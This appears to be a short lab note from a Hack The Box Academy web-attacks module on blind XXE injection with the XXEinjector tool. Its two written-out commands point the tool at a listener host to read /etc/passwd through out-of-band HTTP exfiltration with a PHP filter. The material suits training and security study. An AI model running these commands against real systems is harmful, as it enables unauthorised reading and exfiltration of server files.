> For the complete documentation index, see [llms.txt](https://kyou00.gitbook.io/xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kyou00.gitbook.io/xyz/academy-htb/view/bug-bounty-hunter/web-attacks/xxe-injector.md).

# XXE Injector

Options 1

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FKSuXpED5ILzE7kdW4rux%2Fimage.png?alt=media&amp;token=73215343-16c8-4238-b426-d173cf8702b9" alt=""><figcaption></figcaption></figure>

First we need to save the request to blind.req

Then just edit the XML content and make sure to put the XXEINJECT

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F3GEXwmdqnQNyMKh46DC5%2Fimage.png?alt=media&amp;token=3e050d1d-d4d0-4d52-90c2-7b665d1149d9" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
ruby XXEinjector.rb --host=10.10.15.45 --httpport=8000 --file=../blind.req --path=/etc/passwd --oob=http --phpfilter
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2Fzor116eTgpINO6LKpt8J%2Fimage.png?alt=media&amp;token=4a3d1a4b-f7b2-4d54-8257-433cd8d1d191" alt=""><figcaption></figcaption></figure>

Option 2

{% code overflow="wrap" %}

```
ruby XXEinjector.rb --host=10.10.15.45 --httpport=8000 --file=normal.req --path=/etc/passwd --oob=http --phpfilter
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FZHaJ9ihALvCjflgnIzmP%2Fimage.png?alt=media&amp;token=7ec1e9cd-f81d-4729-9196-25b04614fa02" alt=""><figcaption></figcaption></figure>
